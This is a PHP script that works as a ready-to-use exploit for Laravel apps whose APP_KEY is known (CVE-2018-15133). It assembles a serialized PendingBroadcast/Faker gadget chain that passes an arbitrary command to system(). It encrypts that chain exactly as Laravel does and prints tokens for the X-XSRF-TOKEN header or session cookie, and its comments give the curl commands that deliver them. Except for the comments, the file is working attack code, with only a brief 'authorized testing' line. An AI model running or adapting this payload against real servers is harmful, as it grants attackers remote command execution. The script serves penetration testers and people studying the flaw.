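#!/usr/bin/env php
<?php

declare(strict_types=1);

/*
 * Laravel APP_KEY -> encrypted PHP object-injection payload.
 *
 * Laravel's Illuminate\Encryption\Encrypter (6.x, link at the bottom)
 * unserialize()s whatever it successfully decrypts, so anyone holding the
 * application's APP_KEY can mint a ciphertext the app will unserialize on
 * arrival.  This script mirrors Encrypter::encrypt() step by step (random IV,
 * AES-256-CBC, HMAC-SHA256 over base64(iv).ciphertext, JSON, base64) and wraps
 * the serialized gadget below around the command given on the command line.
 *
 * Usage: ./laravel_payload.php ['<command>'] ['<APP_KEY>']
 *   Both arguments fall back to the defaults at the top of main(); the APP_KEY
 *   may be given with or without the "base64:" prefix used in .env.
 *
 * Preconditions the script cannot verify for you:
 *   - the key must be the target's real APP_KEY (AES-256-CBC => 32 raw bytes),
 *     otherwise the target computes a different MAC and discards the token;
 *   - the app must still decrypt-then-unserialize attacker-reachable input
 *     (X-XSRF-TOKEN header / laravel_session cookie per the references);
 *   - Faker\Generator must be autoloadable on the target, otherwise
 *     unserialize() produces an incomplete class and nothing fires.
 * Authorized testing only.
 *
 * Delivery (the token is already urlencoded):
 *   curl -H "X-XSRF-TOKEN: <token>" http://<domain or IP>/
 *   curl -H "Cookie: laravel_session=<token>;" http://<domain or IP>/
 *
 * References:
 *   https://github.com/laravel/framework/blob/6.x/src/Illuminate/Encryption/Encrypter.php
 *   https://blog.truesec.com/2020/02/12/from-s3-bucket-to-laravel-unserialize-rce/
 *   https://github.com/kozmic/laravel-poc-CVE-2018-15133
 */

/** Cipher used by Laravel's default Encrypter; it needs a 32-byte raw key. */
const CIPHER = 'AES-256-CBC';
const KEY_BYTES = 32;

/**
 * Turn a Laravel APP_KEY into raw key bytes.
 *
 * Accepts the key as stored in .env ("base64:<b64>") or as bare base64.
 * Decoding is lenient on purpose (as the original script was) so that a
 * placeholder key is reported by length in main() instead of rejected here.
 */
function laravelKeyBytes(string $appKey): string
{
    if (strncmp($appKey, 'base64:', 7) === 0) {
        $appKey = substr($appKey, 7);
    }
    $raw = base64_decode($appKey);
    return $raw === false ? '' : $raw;
}

/**
 * Build the serialized gadget that runs $cmd through system() when the
 * target unserializes it.
 *
 * Shape: a PendingBroadcast whose protected "events" property is a
 * Faker\Generator with formatters["dispatch"] = "system", and whose protected
 * "event" property is the command string.  Which method call chains these
 * together at runtime is described in the referenced PoC, not here.
 */
function buildGadget(string $cmd): string
{
    // serialize() marks protected properties as "\0*\0name".
    $prot = "\x00*\x00";

    // serialize() string lengths are byte counts, so strlen() (not mb_strlen)
    // is the correct length even for multibyte commands.
    return 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{'
        . 's:9:"' . $prot . 'events";'
        . 'O:15:"Faker\Generator":1:{'
        . 's:13:"' . $prot . 'formatters";a:1:{s:8:"dispatch";s:6:"system";}'
        . '}'
        . 's:8:"' . $prot . 'event";s:' . strlen($cmd) . ':"' . $cmd . '";'
        . '}';
}

/**
 * Encrypt $plaintext exactly the way Laravel's Encrypter::encrypt() does and
 * return the base64 JSON envelope {iv, value, mac}.
 *
 * @throws RuntimeException when OpenSSL or json_encode fails.
 */
function laravelEncrypt(string $plaintext, string $key): string
{
    $ivLen = openssl_cipher_iv_length(CIPHER);
    if ($ivLen === false) {
        throw new RuntimeException('Could not encrypt the data.');
    }
    $iv = random_bytes($ivLen);

    // options=0 makes openssl_encrypt() return base64 text, which is what
    // Laravel feeds into the MAC and the JSON envelope.
    $value = openssl_encrypt($plaintext, CIPHER, $key, 0, $iv);
    if ($value === false) {
        throw new RuntimeException('Could not encrypt the data.');
    }

    // The MAC covers base64(iv) . base64(ciphertext), keyed with the raw key.
    $iv = base64_encode($iv);
    $mac = hash_hmac('sha256', $iv . $value, $key);

    $json = json_encode(compact('iv', 'value', 'mac'));
    if ($json === false || json_last_error() !== JSON_ERROR_NONE) {
        throw new RuntimeException('Could not json encode data.');
    }

    return base64_encode($json);
}

/**
 * Entry point: read command and key from $args (argv-style), print the token.
 *
 * @param array $args argv-style array; [1] = command, [2] = APP_KEY (both optional)
 * @return int process exit status (0 on success, 1 on failure)
 */
function main(array $args): int
{
    $cmd = (string) ($args[1] ?? 'ls -la');          // edit here or pass as argv[1]
    $appKey = (string) ($args[2] ?? 'dBL.....j0=');  // edit here or pass as argv[2]

    $key = laravelKeyBytes($appKey);
    if (strlen($key) !== KEY_BYTES) {
        // openssl_encrypt() may still hand back a ciphertext for a wrong-length
        // key, but the target derives its MAC from the real key and will not
        // accept this token -- so say so instead of failing silently.
        error_log(sprintf(
            '[!] key decodes to %d bytes, %s needs %d; the target will reject the MAC',
            strlen($key),
            CIPHER,
            KEY_BYTES
        ));
    }

    try {
        $token = laravelEncrypt(buildGadget($cmd), $key);
    } catch (RuntimeException $e) {
        echo $e->getMessage(), PHP_EOL;
        return 1;
    }

    // urlencode() so base64's '+', '/' and '=' survive header/cookie parsing.
    $encoded = urlencode($token);

    // X-XSRF-TOKEN is consumed as a request header, laravel_session as a cookie.
    echo '[+] X-XSRF-TOKEN: ' . $encoded . PHP_EOL;
    echo '[+] Cookie: laravel_session=' . $encoded . PHP_EOL;

    return 0;
}

if (main($_SERVER['argv'] ?? []) !== 0) {
    exit(1);
}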